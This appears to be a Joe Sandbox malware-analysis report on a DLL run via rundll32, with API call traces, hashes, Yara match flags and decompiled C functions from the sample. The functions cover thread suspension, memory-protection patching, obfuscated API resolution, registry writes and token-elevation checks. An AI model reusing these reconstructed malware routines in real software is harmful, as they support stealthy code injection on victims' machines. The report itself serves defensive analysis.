                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,036D3DBA,?,?,4D283A53,?), ref: 036D7770
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: ad7650581eca982c1a3242cef1f46f19acfc2a820e59152469d65a0c2de42467
                                                          • Instruction ID: 6de7adf7dde140482bb4f0f5c0ecbade3e1f01497a58c5e62aa8f37021121083
                                                          • Opcode Fuzzy Hash: ad7650581eca982c1a3242cef1f46f19acfc2a820e59152469d65a0c2de42467
                                                          • Instruction Fuzzy Hash: 2B21E476E41204BBD711EF68EC09F9E77F9AB88750F250124FA05EB2C8D7B09905CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 353 627c5c4-627c609 memset call 628212c 356 627c6f5-627c6fc 353->356 357 627c60f 353->357 358 627c616-627c61e 356->358 359 627c702-627c705 call 628ed07 356->359 357->358 361 627c620-627c637 call 6286de0 358->361 362 627c63d-627c64f 358->362 363 627c70a 359->363 361->362 372 627c73c-627c740 361->372 365 627c651-627c658 call 62714c6 362->365 366 627c65b-627c672 call 6285220 362->366 367 627c73a 363->367 365->366 374 627c734 GetLastError 366->374 375 627c678-627c67c 366->375 367->372 376 627c742 372->376 377 627c74b-627c751 372->377 374->367 378 627c682-627c693 call 6289048 375->378 379 627c72d-627c732 375->379 376->377 378->374 382 627c699 378->382 379->372 383 627c69e-627c6ba WaitForSingleObject 382->383 385 627c6bf-627c6e2 SuspendThread call 62736bb 383->385 386 627c6bc-627c6be 383->386 389 627c6e4-627c6e7 385->389 390 627c6e9-627c6ec 385->390 386->385 389->383 389->390 391 627c6ee-627c6f3 390->391 392 627c70c-627c71a call 6286de0 390->392 393 627c71c-627c72b call 6289048 391->393 392->393 393->372
                                                          APIs
                                                          • memset.NTDLL ref: 0627C5E7
                                                            • Part of subcall function 0628212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0627111D,00000000), ref: 0628214D
                                                            • Part of subcall function 0628212C: GetProcAddress.KERNEL32(00000000,?), ref: 06282166
                                                            • Part of subcall function 0628212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0627111D,00000000), ref: 06282183
                                                            • Part of subcall function 0628212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0627111D,00000000), ref: 06282194
                                                            • Part of subcall function 0628212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0627111D,00000000), ref: 062821A7
                                                          • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0627C6A1
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0627C6AF
                                                          • SuspendThread.KERNEL32(00000004), ref: 0627C6C2
                                                            • Part of subcall function 06286DE0: memset.NTDLL ref: 062870AA
                                                          • ResumeThread.KERNEL32(00000004), ref: 0627C745
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                                          • String ID: v
                                                          • API String ID: 2397206891-1801730948
                                                          • Opcode ID: c3308e64ddb5488e8d1761eae1d99379f18732012d568b80fd87d057d7bfc10b
                                                          • Instruction ID: a738f564481e8042dcb62bc96dfbdfd9206b90926ab9224c2b3641db0bff8e33
                                                          • Opcode Fuzzy Hash: c3308e64ddb5488e8d1761eae1d99379f18732012d568b80fd87d057d7bfc10b
                                                          • Instruction Fuzzy Hash: 0341CF71A2024AAFDF91AFA4CC88EEE7BB9EF44354F144465EE15AA150CB30DA51CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 93%
                                                          			E036D4274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                          				void* _t17;
                                                          				void* _t18;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t21;
                                                          				intOrPtr _t24;
                                                          				void* _t37;
                                                          				void* _t41;
                                                          				intOrPtr* _t45;
                                                          
                                                          				_t41 = __edi;
                                                          				_t37 = __ebx;
                                                          				_t45 = __eax;
                                                          				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                                          				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                                          					E036D6E40(_t16, __ecx, 0xea60);
                                                          				}
                                                          				_t17 =  *(_t45 + 0x18);
                                                          				_push(_t37);
                                                          				_push(_t41);
                                                          				if(_t17 != 0) {
                                                          					InternetSetStatusCallback(_t17, 0);
                                                          					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                                          				}
                                                          				_t18 =  *(_t45 + 0x14);
                                                          				if(_t18 != 0) {
                                                          					InternetSetStatusCallback(_t18, 0);
                                                          					InternetCloseHandle( *(_t45 + 0x14));
                                                          				}
                                                          				_t19 =  *(_t45 + 0x10);
                                                          				if(_t19 != 0) {
                                                          					InternetSetStatusCallback(_t19, 0);
                                                          					InternetCloseHandle( *(_t45 + 0x10));
                                                          				}
                                                          				_t20 =  *(_t45 + 0x1c);
                                                          				if(_t20 != 0) {
                                                          					FindCloseChangeNotification(_t20); // executed
                                                          				}
                                                          				_t21 =  *(_t45 + 0x20);
                                                          				if(_t21 != 0) {
                                                          					CloseHandle(_t21);
                                                          				}
                                                          				_t22 =  *((intOrPtr*)(_t45 + 8));
                                                          				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                                          					E036D6C2C(_t22);
                                                          					 *((intOrPtr*)(_t45 + 8)) = 0;
                                                          					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                                          				}
                                                          				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                                          				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                                          					E036D6C2C(_t23);
                                                          				}
                                                          				_t24 =  *_t45;
                                                          				if(_t24 != 0) {
                                                          					_t24 = E036D6C2C(_t24);
                                                          				}
                                                          				_t46 =  *((intOrPtr*)(_t45 + 4));
                                                          				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                                          					return E036D6C2C(_t46);
                                                          				}
                                                          				return _t24;
                                                          			}
                                                          0x036d4274
                                                          0x036d4274

                                                          APIs
                                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 036D42A2
                                                          • InternetCloseHandle.WININET(?), ref: 036D42A7
                                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 036D42B2
                                                          • InternetCloseHandle.WININET(?), ref: 036D42B7
                                                          • InternetSetStatusCallback.WININET(?,00000000), ref: 036D42C2
                                                          • InternetCloseHandle.WININET(?), ref: 036D42C7
                                                          • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,036D3801,?,?,76CC81D0,00000000,00000000), ref: 036D42D7
                                                          • CloseHandle.KERNEL32(?,00000000,00000102,?,?,036D3801,?,?,76CC81D0,00000000,00000000), ref: 036D42E1
                                                            • Part of subcall function 036D6E40: WaitForMultipleObjects.KERNEL32(00000002,036D7BB5,00000000,036D7BB5,?,?,?,036D7BB5,0000EA60), ref: 036D6E5B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                                          • String ID:
                                                          • API String ID: 2172891992-0
                                                          • Opcode ID: f4a800e12133e7b46bb712b693749a05f1143057025166cd2e3610f52d2fe836
                                                          • Instruction ID: a70bb3afe09d2a1aa5cf7a05176e6382c774dcb2abb12cb869adf1adc5b67ccc
                                                          • Opcode Fuzzy Hash: f4a800e12133e7b46bb712b693749a05f1143057025166cd2e3610f52d2fe836
                                                          • Instruction Fuzzy Hash: BD11C97AA007485BC631EEABED84C5BF7EDAF492103991D1DE445D7A10CF35FC448A68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                          • WaitForSingleObject.KERNEL32(00000000,?,06899998,?,00000000,00000000,00000001), ref: 06283A03
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06283A3D
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 06283A60
                                                          • RegCloseKey.ADVAPI32(?), ref: 06283A69
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 06283ACD
                                                          • RtlExitUserThread.NTDLL(?), ref: 06283B03
                                                            • Part of subcall function 0628A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0627148A,?,?,?), ref: 0628A66F
                                                            • Part of subcall function 0628A651: GetFileSize.KERNEL32(00000000,00000000,?,?,0627148A,?,?,?), ref: 0628A67F
                                                            • Part of subcall function 0628A651: CloseHandle.KERNEL32(000000FF,?,?,0627148A,?,?,?), ref: 0628A6E1
                                                          • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 06283B5C
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                                                          • String ID:
                                                          • API String ID: 3876914104-0
                                                          • Opcode ID: 3c5c6048b572b589e0508f3920307a8236ce6565f5a4391a10c570a36bd580b2
                                                          • Instruction ID: f2fecdbca074e94008d60f4a8c77d22b5dd27d44cb1f3c9a316cbbc2773822a9
                                                          • Opcode Fuzzy Hash: 3c5c6048b572b589e0508f3920307a8236ce6565f5a4391a10c570a36bd580b2
                                                          • Instruction Fuzzy Hash: D0615E71A11309AFDF40EFA9DC89E9AB7B9FB49760F044129FA18E7290D7309951CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 062733A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 062733CA
                                                            • Part of subcall function 062733A5: GetLastError.KERNEL32(?,00000000), ref: 062733D2
                                                            • Part of subcall function 062733A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 062733E9
                                                            • Part of subcall function 062733A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0627340E
                                                          • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,062960B0,0000001C,0628BE61,00000002,?,00000001,80000000,06299A20,80000000), ref: 06278D90
                                                            • Part of subcall function 0627A253: lstrlen.KERNEL32(?,?), ref: 0627A28B
                                                            • Part of subcall function 0627A253: lstrcpy.KERNEL32(00000000,?), ref: 0627A2A2
                                                            • Part of subcall function 0627A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 0627A2AB
                                                            • Part of subcall function 0627A253: GetModuleHandleA.KERNEL32(00000000), ref: 0627A2C9
                                                          • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 06278D0D
                                                          • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,062960B0,0000001C,0628BE61), ref: 06278D28
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 06278D4D
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06278D6B
                                                            • Part of subcall function 062733A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 06273417
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 899430048-3916222277
                                                          • Opcode ID: 75d05723f72f0e0c16ed5762066ad3e04e368562a3959d7907f50b6b8d3ff98c
                                                          • Instruction ID: 20cc91f50007435b67709d4faef0c8352c980a69fe1c70971e05daae41008701
                                                          • Opcode Fuzzy Hash: 75d05723f72f0e0c16ed5762066ad3e04e368562a3959d7907f50b6b8d3ff98c
                                                          • Instruction Fuzzy Hash: 4341797091021AAFDB50CF69D848EADBBB4FF48310F10812AED24AB240C778E950CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062861AE: GetProcAddress.KERNEL32(?,00000318), ref: 062861D3
                                                            • Part of subcall function 062861AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 062861EF
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628561D
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 06285708
                                                            • Part of subcall function 062861AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 06286359
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 06285653
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628565F
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 0628569C
                                                          • StrChrA.SHLWAPI(?,0000002E), ref: 062856A5
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 062856B7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                          • String ID:
                                                          • API String ID: 3901270786-0
                                                          • Opcode ID: 809c514d7356f6d4206414113c3967851e5bcf68caaf1c90c0ec91b23017f9b7
                                                          • Instruction ID: a82f50704bd585bc1f2a1c5b5b737ffd0caa43ed58fbfefbf2b105d4681a4160
                                                          • Opcode Fuzzy Hash: 809c514d7356f6d4206414113c3967851e5bcf68caaf1c90c0ec91b23017f9b7
                                                          • Instruction Fuzzy Hash: 8C316F71916322AFD3A19F11DC44B1BBBE9FF88755F100918FD8476280D774E904CAA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E036D402A(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E036D44DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E036D7A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x36da300 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x36da348; // 0x228d5a8
                                                          					_t18 = _t47 + 0x36db3f3; // 0x73797325
                                                          					_t68 = E036D7326(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x36da348; // 0x228d5a8
                                                          						_t19 = _t50 + 0x36db73f; // 0x5968ce7
                                                          						_t20 = _t50 + 0x36db0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E036D23AA();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                                                          							_push(1);
                                                          							E036D23AA();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								FindCloseChangeNotification(_v28); // executed
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x36da2d8, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E036D6C2C(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 036D44DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,036D4046,?,?,?,?,00000000,00000000), ref: 036D4503
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 036D4525
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 036D453B
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 036D4551
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 036D4567
                                                            • Part of subcall function 036D44DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 036D457D
                                                          • memset.NTDLL ref: 036D4094
                                                            • Part of subcall function 036D7326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,036D40AD,73797325), ref: 036D7337
                                                            • Part of subcall function 036D7326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 036D7351
                                                          • GetModuleHandleA.KERNEL32(4E52454B,05968CE7,73797325), ref: 036D40CA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 036D40D1
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D4139
                                                            • Part of subcall function 036D23AA: GetProcAddress.KERNEL32(36776F57,036D7989), ref: 036D23C5
                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 036D4116
                                                          • CloseHandle.KERNEL32(?), ref: 036D411B
                                                          • GetLastError.KERNEL32(00000001), ref: 036D411F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                                          • String ID:
                                                          • API String ID: 186216982-0
                                                          • Opcode ID: ace7dff4aac99154d48a423fa602e089378974a625ab59664adc5b1aaea010d1
                                                          • Instruction ID: b89e5d46dca7d16d3f378a7fabd1a431656c1044ca17daaea2035c07699dd930
                                                          • Opcode Fuzzy Hash: ace7dff4aac99154d48a423fa602e089378974a625ab59664adc5b1aaea010d1
                                                          • Instruction Fuzzy Hash: 0F316DB6C00208AFDB11EFA5DC88EAEBFBCEB08344F154469EA05E7214DB319E55CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062773EB: memset.NTDLL ref: 062773F5
                                                          • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?), ref: 06271381
                                                          • SetEvent.KERNEL32(00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0627138E
                                                          • Sleep.KERNEL32(00000BB8,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06271399
                                                          • ResetEvent.KERNEL32(00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062713A0
                                                          • CloseHandle.KERNEL32(00000000,?,0627E2A4,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062713A7
                                                          • GetShellWindow.USER32 ref: 062713B2
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 062713B9
                                                            • Part of subcall function 0628B1DC: RegCloseKey.ADVAPI32(0627E2A4), ref: 0628B25F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                          • String ID:
                                                          • API String ID: 53838381-0
                                                          • Opcode ID: 0b818f8ac6b233a421530ec61f1d970d249f56df5e558cf91e911d44356c8c32
                                                          • Instruction ID: 693fe545881ad084cf585ef7b6990eac19ab7867a633e9d7e32814d2ead19678
                                                          • Opcode Fuzzy Hash: 0b818f8ac6b233a421530ec61f1d970d249f56df5e558cf91e911d44356c8c32
                                                          • Instruction Fuzzy Hash: 6C216032A11311BFC3916A67BC8CEAF776AAFCA610B188005FA1997640DB759411CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E036D6C41(long* _a4) {   // returns the TokenIsElevated flag; *_a4 receives the caller's integrity-level RID
				long _v8;      // size returned by GetTokenInformation
				void* _v12;    // process token handle
				void _v16;     // TOKEN_ELEVATION.TokenIsElevated
				long _v20;     // integrity RID, defaults to SECURITY_MANDATORY_MEDIUM_RID
				int _t33;
				void* _t46;    // heap buffer holding a TOKEN_MANDATORY_LABEL

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x36da2fc > 5) {   // global, apparently the OS major version: elevation and integrity levels only exist from Vista (6.0) on, so pre-Vista is treated as elevated/medium
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {   // 0xffffffff = GetCurrentProcess(); 0x20008 = STANDARD_RIGHTS_READ | TOKEN_QUERY
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; 0x14 = TokenElevation (4-byte TOKEN_ELEVATION)
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; 0x19 = TokenIntegrityLevel, size probe only
						if(_v8 != 0) {
							_t46 = E036D6D63(_v8);   // RtlAllocateHeap wrapper (see APIs below)
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									// *_t46 is TOKEN_MANDATORY_LABEL.Label.Sid; the RID is the SID's last sub-authority (count - 1, truncated to a byte)
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E036D6C2C(_t46);   // RtlFreeHeap wrapper
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

Instruction addresses (one per statement, in order): 0x036d6c4e 0x036d6c55 0x036d6c5c 0x036d6c70 0x036d6c7b 0x036d6c93 0x036d6ca0 0x036d6ca3 0x036d6ca8 0x036d6cb3 0x036d6cb7 0x036d6cc6 0x036d6cca 0x036d6ce6 0x036d6ce6 0x036d6cea 0x036d6cea 0x036d6cef 0x036d6cf3 0x036d6cf9 0x036d6cfa 0x036d6d01 0x036d6d07

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 036D6C73
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 036D6C93
• GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 036D6CA3
                                                          • CloseHandle.KERNEL32(00000000), ref: 036D6CF3
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 036D6CC6
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 036D6CCE
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 036D6CDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 716d818a226a14fc3dc5fb34a40dfd719117dfe5978eef777db300387a4c4aef
                                                          • Instruction ID: dedefd00ec2c005a0723eb0e86fcb42caf8f4166f8fde1aaeeabf32de90a1c13
                                                          • Opcode Fuzzy Hash: 716d818a226a14fc3dc5fb34a40dfd719117dfe5978eef777db300387a4c4aef
